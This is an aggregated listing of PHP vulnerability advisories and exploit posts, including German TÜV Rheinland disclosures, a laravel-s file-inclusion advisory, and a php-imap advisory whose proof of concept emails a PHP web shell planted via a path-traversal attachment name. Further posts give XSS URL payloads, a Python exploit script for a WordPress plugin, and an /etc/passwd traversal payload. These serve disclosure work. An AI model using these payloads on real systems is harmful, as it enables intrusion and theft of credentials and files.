laravel-s prior to 3.7.36 is vulnerable to Local File Inclusion via `/src/Illuminate/Laravel.php`.

**laravel-s vulnerable to Local File Inclusion**

Moderate severity GitHub Reviewed Published Jun 22, 2023 to the GitHub Advisory Database • Updated Jun 22, 2023

GHSA-q2fp-jw87-86px: laravel-s vulnerable to Local File Inclusion

A reflected cross-site scripting (XSS) vulnerability in DATEV eG Personal-Management System Comfort/Comfort Plus v15.1.0 to v16.1.1 P4 allows attackers to steal targeted users' login data by sending a crafted link.

**Sicherheitslücke im Bewerberportal "Datev Personal-Managementsystem comfort/comfort plus" der Firma DATEV eG**

Der Sicherheitsforscher Max Bäumler, von der TÜV Rheinland i-sec GmbH hat eine Sicherheitslücke im Bewerberportal "Datev Personal-Managementsystem comfort/comfort plus" der Firma DATEV eG entdeckt. Betroffen sind die Versionen 15.1.0 P6 (vermutlich ab 15.1.0) - 16.1.1 P1 (vermutlich bis 16.1.1 P3).

DATEV eG wurde am 25.04.2023 über die Schwachstelle informiert. Ein Sicherheitsupdate mit der Versionsnummer 16.1.1 P4 wurde am 28.04.2023 bereitgestellt, welches diese Schwachstelle behebt. Dieser Patch ist unter nachfolgender URL zum Download bereitgestellt: https://support.veda.net/datev.php Es wird empfohlen, dass Betroffene Nutzer diesen Patch sobald wie möglich einspielen.

Die Schwachstelle wurde mit der Kennung CVE-2023-33387 versehen und hat einen hohen CVSS-Schweregrad 7,1 von 10.

Einem potenziellen Angreifer ist es möglich, sofern ein Nutzer einen vom Angreifer manipulierten Link anklickt, die Zugangsdaten des Nutzers abzugreifen wenn dieser sich einloggt. Dadurch kann er Zugriff auf die persönlichen Daten des Nutzers wie z. B. Bewerbungsunterlagen erhalten.

Die Forscher der TÜV Rheinland i-sec GmbH bedanken sich bei DATEV eG für die professionelle Zusammenarbeit sowie die ihr Engagement um eine zeitnahe Bereitstellung des Sicherheitsupdates.

**ENOVIA V6 - Mehrere Sicherheitslücken ermöglichen Remote-Code-Ausführung**

Sicherheitsforscher Shadi Habbal, von der TÜV Rheinland i-sec GmbH, hat zwei Sicherheitslücken in "ENOVIA V6", einem Produkt von Dassault Systèmes, entdeckt. Bei den entdeckten Schwachstellen handelt es sich um XSLT- und XXE-Injektionen, die verkettet werden können, um Remotecodeausführung auf den betroffenen Systemen zu erreichen. Die Schwachstellen wurden während einer Red-Team-Kampagne entdeckt.

Die betroffene Version von ENOVIA ist „V6R2013xE“.

Dassault Systèmes wurde am 10. August 2022 über diese Sicherheitslücke informiert, und am 28. November 2022 wurde ein Fix veröffentlicht. Der Patch behebt die Sicherheitslücken in der unterstützten Version. Es ist wichtig, dass Benutzer der betroffenen Versionen von ENOVIA den Patch so bald wie möglich installieren.

Den Schwachstellen wurden die Kennungen CVE-2023-1288 und CVE-2023-1287 zugewiesen und haben einen hohen Schweregrad.

TÜV Rheinland i-sec GmbH bedankt sich bei Dassault Systèmes für Ihr Engagement, die Schwachstellen zu beheben.

**baramundi Management Agent - Von Buffer-Overflow zu Remote-Code-Execution**

Der Sicherheitsforscher Shadi Habbal von TÜV Rheinland i-sec GmbH hat eine Buffer Overflow-Schwachstelle in dem „baramundi Management Agent“ (bMA), einem Modul der „baramundi Management Suite“ (bMS), entdeckt. Ein Angreifer könnte möglicherweise diese Schwachstelle ausnutzen, um das betroffene Modul abstürzen zu lassen oder bei Erfüllung bestimmter Bedingung, z. B. CVE-2022-44654, Remote-Code-Execution zu erreichen. In beiden Szenarien müssen Angreifende in der Lage sein, den oder die Benutzer\*in dazu zu bringen, eine vorbereitete bzw. manipulierte Webseite zu besuchen, die im Internet/Intranet gehostet wird.

Betroffene Produkte sind alle Versionen von baramundi, einschließlich bMS 2022 R1, bMS 2021 R2, bMS 2021 R1 und früher.

baramundi AG wurde am 04.08.2022 über diese Schwachstelle informiert und das Sicherheitsupdate "S-2022-01" wurde am 27.09.2022 veröffentlicht. Das Sicherheitsupdate behebt die Schwachstelle in allen unterstützten Versionen. Es ist wichtig, dass Benutzer von betroffenen Versionen von baramundi den Patch so schnell wie möglich installieren.

Die Schwachstelle wurde mit der Kennung CVE-2022-43747 zugewiesen und hat einen hohen Schweregrad.

Der Forscher und die TÜV Rheinland i-sec GmbH möchten dem Product-Security-Incident-Response-Team von baramundi für die professionelle Kommunikation und baramundis Engagement bei der Beseitigung dieser Schwachstelle danken.

**Trend Micro Apex One - Schwachstelle in UMH-Monitoring-Engine-Module**

Sicherheitsforscher Shadi Habbal von der TÜV Rheinland i-sec GmbH hat eine Schwachstelle im User-Mode-Hooking (UMH) Monitoring-Engine-Modul von Trend Micro Apex One und Apex One as a Service entdeckt. Diesem Modul fehlt eine wichtige Sicherheitsfeature namens "SafeSEH". Das Modul hilft bei der Überwachung auf bösartige Nutzdaten unter Windows, indem es sich selbst in jeden Prozess im Benutzermodus injiziert und in bestimmte Windows-APIs einhakt.

Das Fehlen des "SafeSEH"-Schutzes macht das Modul angreifbar. Ein Angreifer könnte eine SEH-basierte Pufferüberlauf-Schwachstelle so ausnutzen, dass mithilfe dieser Schwachstelle eine wichtige Voraussetzung erfüllt wird, um Sicherheitsmaßnahmen zu umgehen und der betroffenen Software oder dem Gerät, auf dem sie läuft, Schaden zuzufügen. Diese Schwachstelle betrifft Apex One 2019 (On-Premises) und Apex One as a Service.

Trend Micro wurde am 8.08.2022 über diese Schwachstelle informiert und ein Fix wurde am 25.10.2022 veröffentlicht. Es wird empfohlen, dass Benutzer der betroffenen Versionen von Apex One diesen Patch oder den letzten verfügbaren kumulativen Patch so schnell wie möglich installieren. Die Schwachstelle wurde mit der Kennung CVE-2022-44654 versehen und hat einen CVSS-Schweregrad 7,5 von 10.

Die TÜV Rheinland i-sec GmbH dankt dem Product-Security-Incident-Response-Team von Trend Micro für die professionelle Kommunikation und für das Engagement von Trend Micro bei der Behebung dieser Schwachstelle.

**Lokale Rechteausweitung-Schwachstelle in otris “Update Manager”**

"Update Manager" in der Version 1.2.1.0 (und möglicherweise früher), eine Softwarekomponente der otris software AG, die von mehreren otris-Anwendungen, z.B. otris Privacy, verwendet wird, um die Aktualisierung von otris-Produkten zu erleichtern; ermöglicht Angreifern, ihre Rechte auf Windows-Systemen auf SYSTEM (höchste Berechtigung unter Windows) zu erweitern, indem sie eine Schwachstelle in der oben genannten Software ausnutzen.

Bekannte betroffene otris-Produkte sind otris Privacy < v7.0.7. Andere otris-Produkte, die die betroffene Software verwenden, könnten ebenfalls betroffen sein.

Unternehmen wird empfohlen zu prüfen, ob die oben genannte Software auf ihren Systemen im Einsatz ist und sich bei der otris software AG nach aktuellen Versionen zu erkundigen.

Sicherheitsforscher Shadi Habbal von der TÜV Rheinland i-sec GmbH entdeckte die Schwachstelle während eines aktiven Penetrationstests und nutzte die Schwachstelle erfolgreich als Proof-of-Concept aus.

Die Schwachstelle wurde am 01.09.2021 an die otris software AG gemeldet. Der otris software AG wurde eine Frist von 90 Tagen eingeräumt, um einen Fix zu veröffentlichen. Weitere 60 Tage wurden gewährt, um Unternehmen bei der Aktualisierung ihrer Systeme zu unterstützen.

Die Schwachstelle wurde nach Aussage von otris behoben und das Produkt im Anschluss einem Penetrationstest unterzogen.

Die Schwachstelle wurde CVE-2021-40376 zugeordnet. Weitere technische Einzelheiten finden Sie in dem beigefügten PDF-Dokument.

CVE-2023-33387: TÜV Rheinland – Aufgedeckte Schwachstellen

laravel-s 3.7.35 is vulnerable to Local File Inclusion via /src/Illuminate/Laravel.php.

When the settings "handle\_static" is true, LaravelS is affected by a LFI vulnerability.

public function handleStatic(IlluminateRequest $request)
{
    $uri = $request\->getRequestUri();
    if (isset(self::$staticBlackList\[$uri\])) {
        return false;
    }
    $uri = (string)str\_replace("\\0", '', urldecode($uri));

    $requestFile = $this\->conf\['static\_path'\] . $uri;
    if (is\_file($requestFile)) {
        return $this\->createStaticResponse($requestFile, $request);
    }
    ...

CVE-2023-29931: Local File Inclusion (LFI) vulnerability · Issue #437 · hhxsv5/laravel-s

### Summary
An unsanitized attachment filename allows any unauthenticated user to leverage a directory traversal vulnerability which results in a remote code execution vulnerability.

### Details
An attacker can send an email with a malicious attachment to the inbox, which gets crawled with webklex/php-imap or webklex/laravel-imap. Prerequisite for the vulnerability is that the script stores the attachments without providing a `$filename`, or providing an unsanitized `$filename`, in `src/Attachment::save(string $path, string $filename = null)` (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L251-L255).
In this case, where no `$filename` gets passed into the `Attachment::save()` method, the package would use a series of unsanitized and insecure input values from the mail as fallback (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L252).
Even if a developer passes a `$filename` into the `Attachment::save()` method, e.g. by passing the name or filename of the mail attachment itself (from email headers), the input values never get sanitized by the package.
There is also no restriction about the file extension (e.g. ".php") or the contents of a file. This allows an attacker to upload malicious code of any type and content at any location where the underlying user has write permissions.
The attacker can also overwrite existing files and inject malicious code into files that, e.g. get executed by the system via cron, requests,...
The official documentation only shows examples of `Attachment::save()` without providing the `$filename` (https://www.php-imap.com/api/attachment), which makes this vulnerability even more widespread.

### PoC
1. send an email with a malicious attachment to an inbox, which gets crawled by the package
```
Return-Path: <attacker@example.com>
Date: Fri, 17 Aug 2018 14:36:24 +0000
From: Attacker <attacker@example.com>
To: Victim <victim@example.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_"

Mail with malicious attachment

--_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_
Content-Type: application/octet-stream; name=shell.php
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename=../../../../../../../../../../../../var/www/shell.php

<?php
// RCE
system($_GET['cmd'] ?? '#');
?>

--_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_--


```
3. crawl email with malicious attachment
4. store the attachment with `Attachment::save('/path/to/storage')` without providing a `$filename` value

### Impact
This is a remote code execution vulnerability that is made possible through a directory traversal vulnerability.
Every application that stores attachments with `Attachment::save()` without providing a `$filename` or passing unsanitized user input is affected by this attack.


**Summary**

An unsanitized attachment filename allows any unauthenticated user to leverage a directory traversal vulnerability which results in a remote code execution vulnerability.

**Details**

An attacker can send an email with a malicious attachment to the inbox, which gets crawled with webklex/php-imap or webklex/laravel-imap. Prerequisite for the vulnerability is that the script stores the attachments without providing a $filename, or providing an unsanitized $filename, in src/Attachment::save(string $path, string $filename = null) (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L251-L255).  
In this case, where no $filename gets passed into the Attachment::save() method, the package would use a series of unsanitized and insecure input values from the mail as fallback (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L252).  
Even if a developer passes a $filename into the Attachment::save() method, e.g. by passing the name or filename of the mail attachment itself (from email headers), the input values never get sanitized by the package.  
There is also no restriction about the file extension (e.g. ".php") or the contents of a file. This allows an attacker to upload malicious code of any type and content at any location where the underlying user has write permissions.  
The attacker can also overwrite existing files and inject malicious code into files that, e.g. get executed by the system via cron, requests,...  
The official documentation only shows examples of Attachment::save() without providing the $filename (https://www.php-imap.com/api/attachment), which makes this vulnerability even more widespread.

**PoC**

1.  send an email with a malicious attachment to an inbox, which gets crawled by the package

    Return-Path: <attacker@example.com>
    Date: Fri, 17 Aug 2018 14:36:24 +0000
    From: Attacker <attacker@example.com>
    To: Victim <victim@example.com>
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
     boundary="_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_"
    
    Mail with malicious attachment
    
    --_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_
    Content-Type: application/octet-stream; name=shell.php
    Content-Transfer-Encoding: 8bit
    Content-Disposition: attachment; filename=../../../../../../../../../../../../var/www/shell.php
    
    <?php
    // RCE
    system($_GET['cmd'] ?? '#');
    ?>
    
    --_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_--
    
    
    

3.  crawl email with malicious attachment
4.  store the attachment with Attachment::save('/path/to/storage') without providing a $filename value

**Impact**

This is a remote code execution vulnerability that is made possible through a directory traversal vulnerability.  
Every application that stores attachments with Attachment::save() without providing a $filename or passing unsanitized user input is affected by this attack.

**References**

*   GHSA-47p7-xfcc-4pv9
*   Webklex/php-imap#414
*   https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L251-L255
*   https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L252
*   https://github.com/Webklex/php-imap/releases/tag/5.3.0

GHSA-47p7-xfcc-4pv9: php-imap vulnerable to RCE through a directory traversal vulnerability

User Registration & Login and User Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/search-result.php.

Permalink

**1** contributor

**Users who have contributed to this file**

Exploit Title:User Registration & Login and User Management System v1.0 - cross-site scripting (XSS) vulnerability

the component - /admin/search-result.php.

Vendor of Product - https://phpgurukul.com/

Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/

Tested on: Linux

Attack Type - Local

Attack Vectors- searchkey

CVE-2023-33591: CVE/CVE 2023-33591 at main · DARSHANAGUPTA10/CVE

PHP Online School version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/online-school/                                 ││  Vendor   : NetArt Media                                                               ││  Software : PHP Online School 1.0                                                      ││  Vuln Type: Reflected XSS - Stored XSS                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Reflected XSS                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        ││                                                                                        ││  Stored XSS                                                                            ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://website/users/index.php?category=home&action=welcome&category=home&action=welcome&order=date&order_type=desc&e9m9f"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"fgok8=1## Stored XSSPOST /online-school/users/index.php HTTP/2-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="title"Any Title-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="post_message"-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="message"[XSS Payload]-----------------------------124654322118707720774051212206## Steps to Reproduce:1. Signup & Login in any Normal User Mode2. Go to [My Question] Click [Ask a New Question] on this Path (https://website/users/index.php?category=tickets&action=new)3. Select Any Subject4. Write any Title5. Inject your [XSS Payload] in "Message Box"6. Select Any Priority7. Press Submit8. When ADMIN check Student Questions on this Path (https://website/admin/index.php?category=tickets&action=new)9. XSS Will Fire and Executed on his Browser [-] Done

PHP Online School 1.0 Cross Site Scripting

PHP Mail version 5.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/mall/                                          ││  Vendor   : NetArt Media                                                               ││  Software : PHP Mall 5.0                                                               ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://website/index.php?proceed_search=1&mod=products&lang=en&search_by=&proceed_search=1&mod=products&lang=en&search_by=&num=2&iv3s6"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b6yhe=1[-] Done

PHP Mall 5.0 Cross Site Scripting

WordPress Super Socializer plugin version 7.13.52 suffers from a cross site scripting vulnerability.

    # Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable_param = "<img src=x onerror=alert(document.domain)>"# The payload that exploits the vulnerabilitypayload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}# Send a POST request to the vulnerable endpoint with the payloadresponse = requests.post(url, data=payload)# Check if the payload was executed by searching for the injected script tagif "<img src=x onerror=alert(document.domain)>" in response.text:    print("Vulnerability successfully exploited")else:    print("Vulnerability not exploitable")

WordPress Super Socializer 7.13.52 Cross Site Scripting

Accent Microcomputers CMS version 2.4 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Accent Microcomputers CMS v 2.4 Directory Traversal Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Telegram  : @indoushka                                                                                                         || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.accent.com.pl                                                                                           |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : ../../../../../../../../../etc/passwdhttp://127.0.0.1/www/mmrtradingpl/index.php?id=50&file=../../../../../../../../../etc/passwdhttp://127.0.0.1/www/transcomfortpl/index.php?id=50&file=../../../../../../../../../etc/passwd=====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh        |============================================================================================================================================

Accent Microcomputers CMS 2.4 Directory Traversal

PHP Car Dealer version 3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/autodealer/                                    ││  Vendor   : NetArt Media                                                               ││  Software : PHP Car Dealer 3.0                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://www.website/index.php?page=en_Latest%20Listings&page=en_Latest%20Listings&order_by=price_max&bprcc"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"madvv=1[-] Done

Tag

#php